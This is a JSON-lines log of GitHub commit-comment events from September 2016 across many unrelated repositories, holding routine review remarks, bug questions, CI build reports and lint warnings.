{"id":"4500645528","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18858512,"position":32,"line":28,"path":"doc/python_api/rst/bge_types/bge.types.KX_CubeMap.rst","commit_id":"612b552fd34c042677d776e1640fdf96569a6cb7","created_at":"2016-09-01T06:05:31Z","updated_at":"2016-09-01T06:05:31Z","body":"A python code snippet would be cool here in my opinion"}},"created_at":"2016-09-01T06:05:31Z"}
{"id":"4500649578","type":"CommitCommentEvent","actor":{"login":"tomheller"},"repo":{"name":"Dynatrace/css-groundhog"},"payload":{"comment":{"id":18858520,"position":null,"line":null,"path":null,"commit_id":"f6006c7fbddcbafa338b4b5a745a101872069942","created_at":"2016-09-01T06:06:54Z","updated_at":"2016-09-01T06:06:54Z","body":"@ddprrt sorry, I was not aware of that decision and checked how Bootstrap does it. \r\nI will revert this change"}},"created_at":"2016-09-01T06:06:54Z"}
{"id":"4500653185","type":"CommitCommentEvent","actor":{"login":"MaksymVolohin"},"repo":{"name":"MaksymVolohin/MultiPro"},"payload":{"comment":{"id":18858526,"position":null,"line":null,"path":null,"commit_id":"793c1f2e9b55b7b67275240f39cc25a61627d66f","created_at":"2016-09-01T06:08:11Z","updated_at":"2016-09-01T06:08:11Z","body":"1"}},"created_at":"2016-09-01T06:08:11Z"}
{"id":"4500656061","type":"CommitCommentEvent","actor":{"login":"kithrup"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":18858532,"position":null,"line":null,"path":null,"commit_id":"95c2096c42f51e4498e09defdf17ed095b2b9c7e","created_at":"2016-09-01T06:09:14Z","updated_at":"2016-09-01T06:09:14Z","body":"The picker itself should default to the current one.  (Again, this is what Jordan said.)"}},"created_at":"2016-09-01T06:09:14Z"}
{"id":"4500657525","type":"CommitCommentEvent","actor":{"login":"luky1man"},"repo":{"name":"alexisraca/Chopin"},"payload":{"comment":{"id":18858534,"position":null,"line":null,"path":null,"commit_id":"b5376506a87be86a799298aba03a35c5d0ab2d87","created_at":"2016-09-01T06:09:47Z","updated_at":"2016-09-01T06:09:47Z","body":"correccion de codigo"}},"created_at":"2016-09-01T06:09:47Z"}
{"id":"4500666206","type":"CommitCommentEvent","actor":{"login":"cvium"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":18858547,"position":11,"line":243,"path":"flexget/plugins/list/trakt_list.py","commit_id":"aaf1a69384586dc5bd18e42462693ac4d37b2bcb","created_at":"2016-09-01T06:12:48Z","updated_at":"2016-09-01T06:12:48Z","body":"> The current code doesn't work for episodes for me.\r\n\r\nThe newest release? I made some changes to the code yesterday that were released a few hours ago."}},"created_at":"2016-09-01T06:12:48Z"}
{"id":"4500666223","type":"CommitCommentEvent","actor":{"login":"serrem"},"repo":{"name":"serrem/chia"},"payload":{"comment":{"id":18858548,"position":3,"line":3,"path":"README.md","commit_id":"a42759ca7d4b8cbd440144e233db5eac2dc93946","created_at":"2016-09-01T06:12:49Z","updated_at":"2016-09-01T06:12:49Z","body":"yah it is true"}},"created_at":"2016-09-01T06:12:49Z"}
{"id":"4500667164","type":"CommitCommentEvent","actor":{"login":"akihito104"},"repo":{"name":"akihito104/UdonRoad"},"payload":{"comment":{"id":18858552,"position":7,"line":217,"path":"app/src/main/java/com/freshdigitable/udonroad/StatusDetailFragment.java","commit_id":"2b439ab1fefff7a60198bc8b1b573587db256791","created_at":"2016-09-01T06:13:10Z","updated_at":"2016-09-01T06:13:10Z","body":"Tintのキャッシュをクリアする処理を試みている"}},"created_at":"2016-09-01T06:13:10Z"}
{"id":"4500669322","type":"CommitCommentEvent","actor":{"login":"serrem"},"repo":{"name":"serrem/chia"},"payload":{"comment":{"id":18858558,"position":null,"line":null,"path":null,"commit_id":"a42759ca7d4b8cbd440144e233db5eac2dc93946","created_at":"2016-09-01T06:13:57Z","updated_at":"2016-09-01T06:13:57Z","body":"true"}},"created_at":"2016-09-01T06:13:57Z"}
{"id":"4500670576","type":"CommitCommentEvent","actor":{"login":"reedloden"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":18858561,"position":3,"line":469,"path":"setup.py","commit_id":"4bf25fddcd9eb50d0b30be64d377f2455981de92","created_at":"2016-09-01T06:14:24Z","updated_at":"2016-09-01T06:14:24Z","body":"sentry.io as well?"}},"created_at":"2016-09-01T06:14:24Z"}
{"id":"4500673308","type":"CommitCommentEvent","actor":{"login":"mattrobenolt"},"repo":{"name":"getsentry/sentry"},"payload":{"comment":{"id":18858571,"position":3,"line":469,"path":"setup.py","commit_id":"4bf25fddcd9eb50d0b30be64d377f2455981de92","created_at":"2016-09-01T06:15:24Z","updated_at":"2016-09-01T06:15:24Z","body":"I intentionally didn't change email addresses yet. I plan on doing that soon. We had to confirm that we had proper aliases setup, etc."}},"created_at":"2016-09-01T06:15:24Z"}
{"id":"4500674121","type":"CommitCommentEvent","actor":{"login":"suchowan"},"repo":{"name":"suchowan/watson-api-client"},"payload":{"comment":{"id":18858572,"position":null,"line":null,"path":null,"commit_id":"25948520f2533c5c43bb40ec0abddeee2a0921e6","created_at":"2016-09-01T06:15:40Z","updated_at":"2016-09-01T06:15:40Z","body":"The following code is passed.\r\n\r\nrequire 'watson-api-client'\r\nservice = WatsonAPIClient::AlchemyLanguage.new(:apikey=>\"xx\", :verify_ssl=>OpenSSL::SSL::VERIFY_NONE)\r\nresult = service.URLGetTypedRelations('model'=>'en-news', 'url'=>'www.cnn.com', 'outputMode'=>'json')\r\np JSON.parse(result.body)\r\n"}},"created_at":"2016-09-01T06:15:40Z"}
{"id":"4500675204","type":"CommitCommentEvent","actor":{"login":"serrem"},"repo":{"name":"serrem/chia"},"payload":{"comment":{"id":18858573,"position":null,"line":null,"path":null,"commit_id":"a42759ca7d4b8cbd440144e233db5eac2dc93946","created_at":"2016-09-01T06:16:03Z","updated_at":"2016-09-01T06:16:03Z","body":"do  practice everyday  to be a good programmer "}},"created_at":"2016-09-01T06:16:03Z"}
{"id":"4500680944","type":"CommitCommentEvent","actor":{"login":"akihito104"},"repo":{"name":"akihito104/UdonRoad"},"payload":{"comment":{"id":18858581,"position":null,"line":null,"path":"app/src/main/java/com/freshdigitable/udonroad/StatusDetailFragment.java","commit_id":"2b439ab1fefff7a60198bc8b1b573587db256791","created_at":"2016-09-01T06:18:02Z","updated_at":"2016-09-01T06:18:02Z","body":"refs: http://qiita.com/pside/items/839417a7c02f934ec439"}},"created_at":"2016-09-01T06:18:02Z"}
{"id":"4500689492","type":"CommitCommentEvent","actor":{"login":"jmartisk"},"repo":{"name":"jmartisk/hibernate-orm"},"payload":{"comment":{"id":18858591,"position":null,"line":null,"path":null,"commit_id":"8206ab3a50adcd3f468086f6ed0e6304551230ce","created_at":"2016-09-01T06:20:54Z","updated_at":"2016-09-01T06:20:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;LUbxlzYP&#x2F;10-rfe-eap7-293-support-access-to-properties-of-associations-in-envers-queries-hhh-11025\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [RFE] EAP7-293 Support Access to Properties of Associations in Envers Queries (HHH-11025)</a>"}},"created_at":"2016-09-01T06:20:54Z"}
{"id":"4500690920","type":"CommitCommentEvent","actor":{"login":"cutler"},"repo":{"name":"android/platform_frameworks_base"},"payload":{"comment":{"id":18858594,"position":null,"line":null,"path":null,"commit_id":"f4faeac3525fe1ce3707ab785a1651aec367589d","created_at":"2016-09-01T06:21:22Z","updated_at":"2016-09-01T06:21:22Z","body":"Hi\r\nI have this test code:\r\n``` java\r\n\r\n    protected void onCreate(Bundle savedInstanceState) {\r\n        LinearLayout rootView = (LinearLayout) findViewById(R.id.rootView);\r\n        ImageView imageView = new ImageView(this);\r\n        Bitmap bitmap = BitmapFactory.decodeResource(getResources(),R.drawable.a);\r\n        imageView.setImageBitmap(bitmap);\r\n        rootView.addView(imageView, new                 LinearLayout.LayoutParams(ViewGroup.LayoutParams.WRAP_CONTENT,         ViewGroup.LayoutParams.WRAP_CONTENT));\r\n    }\r\n\r\n    public void onClick(View view) {\r\n        LinearLayout rootView = (LinearLayout) findViewById(R.id.rootView);\r\n        ImageView imageView = (ImageView) rootView.getChildAt(0);\r\n        imageView.setImageDrawable(null);\r\n    }\r\n```\r\n\r\nthe code run at Android6.0 ,  but after I click Button and call GC, Bitmap still in memory.\r\nthat is, dump hprof file, file include byte[]，its reference link to Native Stack.\r\nbut same code , run on Android7.0, not this question.\r\n\r\nWhat should I do?  thx very much!"}},"created_at":"2016-09-01T06:21:22Z"}
{"id":"4500691375","type":"CommitCommentEvent","actor":{"login":"allanon"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":18858596,"position":null,"line":null,"path":null,"commit_id":"cc8db0f9040e3da94869f3283bb1cd621f5a15df","created_at":"2016-09-01T06:21:32Z","updated_at":"2016-09-01T06:21:32Z","body":"They replaced existing item drops with the new ones. Here's the list:\r\n```\r\nAmon Ra Tablet  Crimson Bible\r\nEvil Druid  Bible   Crimson Bible\r\nBow Guardian    Bow Crimson Bow\r\nOwl Baron   Gakkung Bow Crimson Bow\r\nDesert Wolf Stiletto    Crimson Dagger\r\nMysteltainn Slayer  Crimson Dagger\r\nOgretooth   Dagger  Crimson Dagger\r\nPasana  Stiletto    Crimson Dagger\r\nPorcellio   Main Gauche Crimson Dagger\r\nSiorava Knife   Crimson Dagger\r\nSkeleton General    Gladius Crimson Dagger\r\nSleeper Damascus    Crimson Dagger\r\nWickebine Tres  Gladius Crimson Dagger\r\nTengu   Huuma Giant Wheel Shuriken  Crimson Huuma Shuriken\r\nHeadless Mule   Jamadhar    Crimson Katar\r\nInjustice   Jamadhar    Crimson Katar\r\nAliot   Claw    Crimson Knuckle\r\nBloody Butterfly    Waghnak Crimson Knuckle\r\nErrende Ebecee  Morning Star    Crimson Knuckle\r\nGreen Maiden    Studded Knuckles    Crimson Knuckle\r\nJaguar  Claw    Crimson Knuckle\r\nAnacondaq   Glaive  Crimson Lance\r\nGryphon Guisarme    Crimson Lance\r\nOwl Duke    Guisarme    Crimson Lance\r\nAm Mut  Sword Mace  Crimson Mace\r\nErrende Ebecee  Sword Mace  Crimson Mace\r\nKobold Leader   Flail   Crimson Mace\r\nMarionette  Chain   Crimson Mace\r\nPetite  Flail   Crimson Mace\r\nSolider Chain   Crimson Mace\r\nHolden  Six Shooter Crimson Revolver\r\nMetaling    Crimson Bolt    Crimson Revolver\r\nBathory Arc Wand    Crimson Rod\r\nLaurell Weinder Staff   Crimson Rod\r\nArmeyer Dinze   Buster  Crimson Sabre\r\nEgnigem Cenia   Sabre   Crimson Sabre\r\nExecutioner Ring Pommel Sabre   Crimson Sabre\r\nMysteltainn Bastard Sword   Crimson Sabre\r\nOgretooth   Stiletto    Crimson Sabre\r\nPasana  Falchion    Crimson Sabre\r\nNaga    Pike    Crimson Spear\r\nStem Worm   Glaive  Crimson Spear\r\nGiant Hornet    Staff   Crimson Staff\r\nOwl Duke    Morning Star    Crimson Staff\r\nArmeyer Dinze   Battle Axe  Crimson Twohand Axe\r\nKobold  Smasher Crimson Twohand Axe\r\nMajoruros   Two-Handed Axe  Crimson Twohand Axe\r\nNightmare Minorous  Axe Crimson Twohand Axe\r\nAbysmal Knight  Broad Sword Crimson Twohand Sword\r\nBaroness of Retribution Two-Handed Sword    Crimson Twohand Sword\r\nDark Illusion   Broad Sword Crimson Twohand Sword\r\nEgnigem Cenia   Slayer  Crimson Twohand Sword\r\nEgnigem Cenia   Broad Sword Crimson Twohand Sword\r\nMysteltainn Claymore    Crimson Twohand Sword\r\nSword Guardian  Claymore    Crimson Twohand Sword\r\nTamruan Katana  Crimson Twohand Sword\r\nEvil Nymph  Mandolin    Crimson Violin\r\nLady Solace Harp    Crimson Violin\r\nMiyabi Doll Mandolin    Crimson Violin\r\nVioly   Violin  Crimson Violin\r\nEvil Nymph  Lute    Crimson Wire\r\nHermit Plant    Rope    Crimson Wire\r\n```"}},"created_at":"2016-09-01T06:21:32Z"}
{"id":"4500693185","type":"CommitCommentEvent","actor":{"login":"0Lucifer0"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18858601,"position":null,"line":null,"path":null,"commit_id":"589a7dbfe0735fd4e865a74a6fc69341e9735ed5","created_at":"2016-09-01T06:22:10Z","updated_at":"2016-09-01T06:22:10Z","body":"What problem i dont have Any problem "}},"created_at":"2016-09-01T06:22:10Z"}
{"id":"4500693959","type":"CommitCommentEvent","actor":{"login":"danielru"},"repo":{"name":"ANaumann85/movingHeatSDC"},"payload":{"comment":{"id":18858603,"position":null,"line":null,"path":null,"commit_id":"8eb26c0560a5a552cf657bcc0e24107a5a6a5715","created_at":"2016-09-01T06:22:26Z","updated_at":"2016-09-01T06:22:26Z","body":"This commit seems to break multiple tests for SDC."}},"created_at":"2016-09-01T06:22:26Z"}
{"id":"4500696522","type":"CommitCommentEvent","actor":{"login":"kmoore134"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":18858605,"position":null,"line":null,"path":null,"commit_id":"95c2096c42f51e4498e09defdf17ed095b2b9c7e","created_at":"2016-09-01T06:23:16Z","updated_at":"2016-09-01T06:23:16Z","body":"On 09/01/2016 02:09, kithrup wrote:\n>\n> The picker itself should default to the current one. (Again, this is\n> what Jordan said.)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/freenas/freenas/commit/95c2096c42f51e4498e09defdf17ed095b2b9c7e#commitcomment-18858532>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB1_ILbB4pUO2zkKa54c9VBtFsYK_jCxks5qlmwMgaJpZM4JyWN9>.\n>\n\n\nOk.... I'll have to re-do the ask_* function, since we can't assume 0/1\n== BIOS/UEFI if the dialog ordering is going to change...\n\n-- \nKris Moore\niXsystems\nEnterprise Storage & Servers Driven By Open Source\n\n"}},"created_at":"2016-09-01T06:23:16Z"}
{"id":"4500697986","type":"CommitCommentEvent","actor":{"login":"danielru"},"repo":{"name":"ANaumann85/movingHeatSDC"},"payload":{"comment":{"id":18858619,"position":12,"line":25,"path":"multirateSdc/MultirateCollocation.py","commit_id":"8eb26c0560a5a552cf657bcc0e24107a5a6a5715","created_at":"2016-09-01T06:23:48Z","updated_at":"2016-09-01T06:23:48Z","body":"Not sure what this commit changes here, but after several tests in test_sdc_step fail which are passing for the previous commit."}},"created_at":"2016-09-01T06:23:48Z"}
{"id":"4500700555","type":"CommitCommentEvent","actor":{"login":"GautamSidtharth"},"repo":{"name":"Bahmni/bahmni-gauge"},"payload":{"comment":{"id":18858629,"position":300,"line":171,"path":"bahmni-gauge-commons/src/main/java/org/bahmni/gauge/common/program/ProgramManagementPage.java","commit_id":"94bbef9f1522bdf512fd8b5ab487d8fd754c7339","created_at":"2016-09-01T06:24:36Z","updated_at":"2016-09-01T06:24:36Z","body":"Could you people have a look at the latest(daac9d3) commit.\r\nThanks"}},"created_at":"2016-09-01T06:24:36Z"}
{"id":"4500706193","type":"CommitCommentEvent","actor":{"login":"zsoltbalogh"},"repo":{"name":"sez11a/liferay-docs"},"payload":{"comment":{"id":18858650,"position":11,"line":281,"path":"discover/deployment/articles-dxp/03-maintaining-liferay/02-patching-liferay.markdown","commit_id":"0f06f6535b995f8a96639c4e612437d2f759c922","created_at":"2016-09-01T06:26:22Z","updated_at":"2016-09-01T06:26:22Z","body":"The work folder is tomcat specific so I would rather say that: please empty the folders where the application server stores the temporary files (temp folder by default for tomcat) and the compiled jsps (work folder by default for tomcat)."}},"created_at":"2016-09-01T06:26:22Z"}
{"id":"4500709766","type":"CommitCommentEvent","actor":{"login":"wasfan"},"repo":{"name":"wasfan/test"},"payload":{"comment":{"id":18858660,"position":null,"line":null,"path":null,"commit_id":"6f29eaf705f385b7799c81dae9fcb22c1147b9b6","created_at":"2016-09-01T06:27:27Z","updated_at":"2016-09-01T06:27:27Z","body":"ttttttttttt"}},"created_at":"2016-09-01T06:27:27Z"}
{"id":"4500712601","type":"CommitCommentEvent","actor":{"login":"danielru"},"repo":{"name":"ANaumann85/movingHeatSDC"},"payload":{"comment":{"id":18858669,"position":5,"line":19,"path":"multirateSdc/sdc.py","commit_id":"8eb26c0560a5a552cf657bcc0e24107a5a6a5715","created_at":"2016-09-01T06:28:22Z","updated_at":"2016-09-01T06:28:22Z","body":"This seems to change to a deprecated version of this function, suggest to roll back. See #7  "}},"created_at":"2016-09-01T06:28:22Z"}
{"id":"4500713997","type":"CommitCommentEvent","actor":{"login":"soulgalore"},"repo":{"name":"sitespeedio/browsertime"},"payload":{"comment":{"id":18858674,"position":null,"line":null,"path":null,"commit_id":"a298eb341c2c534723d2f92ec59ab155ab9e0b99","created_at":"2016-09-01T06:28:45Z","updated_at":"2016-09-01T06:28:45Z","body":"Is it broken in beta2 so we need beta3 then?"}},"created_at":"2016-09-01T06:28:45Z"}
{"id":"4500714731","type":"CommitCommentEvent","actor":{"login":"cloos"},"repo":{"name":"bestpractical/rt"},"payload":{"comment":{"id":18858679,"position":null,"line":null,"path":null,"commit_id":"8cd8411090e783a460d84a4725e7f33a81145d2f","created_at":"2016-09-01T06:28:59Z","updated_at":"2016-09-01T06:28:59Z","body":"@STREGA @sartak RT extension are already in the \"Loaded perl modules\" section. I like it to show them in a separate section, but then they should be excluded from the \"Loaded perl modules\" section to not show them twice ;-)"}},"created_at":"2016-09-01T06:28:59Z"}
{"id":"4500716226","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858683,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T06:29:29Z","updated_at":"2016-09-01T06:29:29Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-01T06:29:29Z"}
{"id":"4500724482","type":"CommitCommentEvent","actor":{"login":"Airblader"},"repo":{"name":"primefaces/primefaces"},"payload":{"comment":{"id":18858691,"position":24,"line":271,"path":"src/main/java/org/primefaces/component/inputnumber/InputNumberRenderer.java","commit_id":"d8a9334b7497776877c3abc754acac8e1e5f7eb3","created_at":"2016-09-01T06:32:04Z","updated_at":"2016-09-01T06:32:04Z","body":"`counter` is always less than or equal to `length`, so this entire counting process doesn't make much sense to me. What's the rationale for it?"}},"created_at":"2016-09-01T06:32:04Z"}
{"id":"4500728118","type":"CommitCommentEvent","actor":{"login":"ravenzheng"},"repo":{"name":"ravenzheng/reading"},"payload":{"comment":{"id":18858699,"position":null,"line":null,"path":null,"commit_id":"8994afd73d2f211a210be2731e2ce4b8d33f0027","created_at":"2016-09-01T06:33:12Z","updated_at":"2016-09-01T06:33:12Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gQHoDZLK&#x2F;1-read-chapter-03-excel-a-fancy-table-component\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Read chapter 03 - Excel: A Fancy Table Component</a>"}},"created_at":"2016-09-01T06:33:12Z"}
{"id":"4500728342","type":"CommitCommentEvent","actor":{"login":"impressiver"},"repo":{"name":"ThomHPL/BaseI6_updater"},"payload":{"comment":{"id":18858701,"position":null,"line":null,"path":null,"commit_id":"36dba9410fb5a07dbc9c14da1b4f2f43a3aee63a","created_at":"2016-09-01T06:33:16Z","updated_at":"2016-09-01T06:33:16Z","body":"@ThomHPL I've started [porting this to OSX/Linux](/impressiver/BaseI6_updater) and could use a few pointers on what's going on under the hood in `BaseI6_CRC_patcher.exe`. Is the source available so I can make sure I don't miss any important pieces? Thanks!"}},"created_at":"2016-09-01T06:33:16Z"}
{"id":"4500732134","type":"CommitCommentEvent","actor":{"login":"marieALaporte"},"repo":{"name":"Planteome/ibp-wheat-traits"},"payload":{"comment":{"id":18858707,"position":null,"line":null,"path":null,"commit_id":"661ff63dc07b108b41880b78db00c829d82c249e","created_at":"2016-09-01T06:34:28Z","updated_at":"2016-09-01T06:34:28Z","body":"These TO terms were added to the obo file in order to map CO traits 'Time to heading' and 'Time to maturity'. How can we map those traits without saying that they are broader than the TO traits 'days to heading' and 'days to maturity'? \r\nThe 2 CO traits have thus no mapping to TO... \r\nNeed to figure out a solution for this.\r\n@cooperl09 "}},"created_at":"2016-09-01T06:34:28Z"}
{"id":"4500733216","type":"CommitCommentEvent","actor":{"login":"jcsteh"},"repo":{"name":"nvaccess/nvda"},"payload":{"comment":{"id":18858713,"position":null,"line":null,"path":null,"commit_id":"94f63e2e8c481cf215f71ddfbdbc3cd003906c64","created_at":"2016-09-01T06:34:45Z","updated_at":"2016-09-01T06:34:45Z","body":"@feerrenrut: It's worth noting that because t2t is weird, you must terminate lists either with a double blank line, which we do in changes.t2t, or an empty list item (i.e. dash on a line by itself), which we do in userGuide.t2t. Otherwise, the list doesn't close. I've fixed this in f724c2fc, but thought it worth noting for future reference."}},"created_at":"2016-09-01T06:34:45Z"}
{"id":"4500734938","type":"CommitCommentEvent","actor":{"login":"molivaress"},"repo":{"name":"CompartiendoRedesYMicrosoft/LoveCode"},"payload":{"comment":{"id":18858721,"position":5,"line":17,"path":"AplicacionVentaAutomoviles/src/VentaAutomoviles/c4_Persistencia/daoPostgreSql/GestorJDBCSqlServer.java","commit_id":"747a4e225622234ea9ed2d8a003504db8a9bafc0","created_at":"2016-09-01T06:35:16Z","updated_at":"2016-09-01T06:35:16Z","body":"Demo de prueba. aprovada"}},"created_at":"2016-09-01T06:35:16Z"}
{"id":"4500742070","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858746,"position":null,"line":null,"path":null,"commit_id":"eda30b734089e44c9f0284736575015e493de6d0","created_at":"2016-09-01T06:37:25Z","updated_at":"2016-09-01T06:37:25Z","body":"Related to: backdrop/backdrop-issues#1931 "}},"created_at":"2016-09-01T06:37:25Z"}
{"id":"4500742391","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858748,"position":null,"line":null,"path":null,"commit_id":"af307441f50466862ddb51af8959352dcf11b526","created_at":"2016-09-01T06:37:31Z","updated_at":"2016-09-01T06:37:31Z","body":"Related to: backdrop/backdrop-issues#1931 "}},"created_at":"2016-09-01T06:37:31Z"}
{"id":"4500749724","type":"CommitCommentEvent","actor":{"login":"viki27"},"repo":{"name":"viki27/hello-world"},"payload":{"comment":{"id":18858757,"position":null,"line":null,"path":null,"commit_id":"ad7fae234e99df29c249e3cc47302e9241e7da0f","created_at":"2016-09-01T06:39:48Z","updated_at":"2016-09-01T06:39:48Z","body":"this is a demo project."}},"created_at":"2016-09-01T06:39:48Z"}
{"id":"4500752773","type":"CommitCommentEvent","actor":{"login":"derdav3"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":18858764,"position":null,"line":null,"path":null,"commit_id":"d73df6dfe4db4fcf266620c2ade767bd7f8070df","created_at":"2016-09-01T06:40:43Z","updated_at":"2016-09-01T06:40:43Z","body":"How did you include the search component?"}},"created_at":"2016-09-01T06:40:43Z"}
{"id":"4500753973","type":"CommitCommentEvent","actor":{"login":"codacy-bot"},"repo":{"name":"Steam-Chat-Bot/node-steam-chat-bot"},"payload":{"comment":{"id":18858767,"position":null,"line":null,"path":null,"commit_id":"5601ea50fbf28c85ef6415994fa20cd97e4cab15","created_at":"2016-09-01T06:41:03Z","updated_at":"2016-09-01T06:41:03Z","body":"### [Codacy](https://www.codacy.com/app/node-steam-chat-bot/steam-chat-bot/commit?cid=51295772) detected an issue:\n#### Message: `\"withName\" is defined but never used`\n\n    \n#### Occurred on:\n+ **Commit**:  5601ea50fbf28c85ef6415994fa20cd97e4cab15\n+ **File**:    [lib/triggers/bitcoinTrigger.js](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/5601ea50fbf28c85ef6415994fa20cd97e4cab15/lib/triggers/bitcoinTrigger.js)\n+ **LineNum**: [135](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/5601ea50fbf28c85ef6415994fa20cd97e4cab15/lib/triggers/bitcoinTrigger.js#L135)\n+ **Code**:    `const withName = this.chatBot.name + '/' + this.name + ': ';`\n\n    \n#### Currently on:\n+ **Commit**:  02d53c5e399e445af14e1a6ac6c0c42b22d22763\n+ **File**:    [lib/triggers/bitcoinTrigger.js](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/02d53c5e399e445af14e1a6ac6c0c42b22d22763/lib/triggers/bitcoinTrigger.js)\n+ **LineNum**: [252](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/02d53c5e399e445af14e1a6ac6c0c42b22d22763/lib/triggers/bitcoinTrigger.js#L252)\n    "}},"created_at":"2016-09-01T06:41:03Z"}
{"id":"4500754783","type":"CommitCommentEvent","actor":{"login":"marieALaporte"},"repo":{"name":"Planteome/go-site-xrefs-fork"},"payload":{"comment":{"id":18858771,"position":null,"line":null,"path":null,"commit_id":"afcbe14a45cc4e25db3865035c42de8a48e637ac","created_at":"2016-09-01T06:41:16Z","updated_at":"2016-09-01T06:41:16Z","body":"@austinmeier Is this supposed to fix the Ensembl links, like in this example ? http://dev.planteome.org/amigo/gene_product/EnsemblPlants:Brasy-CorV1T55442\r\nBecause this link is broken."}},"created_at":"2016-09-01T06:41:16Z"}
{"id":"4500755610","type":"CommitCommentEvent","actor":{"login":"viki27"},"repo":{"name":"viki27/hello-world"},"payload":{"comment":{"id":18858772,"position":null,"line":null,"path":null,"commit_id":"ad7fae234e99df29c249e3cc47302e9241e7da0f","created_at":"2016-09-01T06:41:32Z","updated_at":"2016-09-01T06:41:32Z","body":"1st Demo Project"}},"created_at":"2016-09-01T06:41:32Z"}
{"id":"4500755844","type":"CommitCommentEvent","actor":{"login":"tobli"},"repo":{"name":"sitespeedio/browsertime"},"payload":{"comment":{"id":18858773,"position":null,"line":null,"path":null,"commit_id":"a298eb341c2c534723d2f92ec59ab155ab9e0b99","created_at":"2016-09-01T06:41:35Z","updated_at":"2016-09-01T06:41:35Z","body":"No, I broke it just before"}},"created_at":"2016-09-01T06:41:35Z"}
{"id":"4500756290","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858774,"position":null,"line":null,"path":null,"commit_id":"a2c5abecd3463eac21990aab92e06a86a62b42bf","created_at":"2016-09-01T06:41:44Z","updated_at":"2016-09-01T06:41:44Z","body":"Related to: backdrop/backdrop-issues#1924 "}},"created_at":"2016-09-01T06:41:44Z"}
{"id":"4500756563","type":"CommitCommentEvent","actor":{"login":"codacy-bot"},"repo":{"name":"Steam-Chat-Bot/node-steam-chat-bot"},"payload":{"comment":{"id":18858775,"position":null,"line":null,"path":null,"commit_id":"267fa797cd334c8ccab9dcedd685e5e13c698daa","created_at":"2016-09-01T06:41:49Z","updated_at":"2016-09-01T06:41:49Z","body":"### [Codacy](https://www.codacy.com/app/node-steam-chat-bot/steam-chat-bot/commit?cid=51295772) detected an issue:\n#### Message: `Expected a conditional expression and instead saw an assignment.`\n\n    \n#### Occurred on:\n+ **Commit**:  267fa797cd334c8ccab9dcedd685e5e13c698daa\n+ **File**:    [lib/triggers/bitcoinTrigger.js](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/267fa797cd334c8ccab9dcedd685e5e13c698daa/lib/triggers/bitcoinTrigger.js)\n+ **LineNum**: [320](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/267fa797cd334c8ccab9dcedd685e5e13c698daa/lib/triggers/bitcoinTrigger.js#L320)\n+ **Code**:    `if(e.message = \"[ExpiredToken: The access token expired]\") {`\n\n    \n#### Currently on:\n+ **Commit**:  02d53c5e399e445af14e1a6ac6c0c42b22d22763\n+ **File**:    [lib/triggers/bitcoinTrigger.js](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/02d53c5e399e445af14e1a6ac6c0c42b22d22763/lib/triggers/bitcoinTrigger.js)\n+ **LineNum**: [319](https://github.com/Steam-Chat-Bot/node-steam-chat-bot/blob/02d53c5e399e445af14e1a6ac6c0c42b22d22763/lib/triggers/bitcoinTrigger.js#L319)\n    "}},"created_at":"2016-09-01T06:41:49Z"}
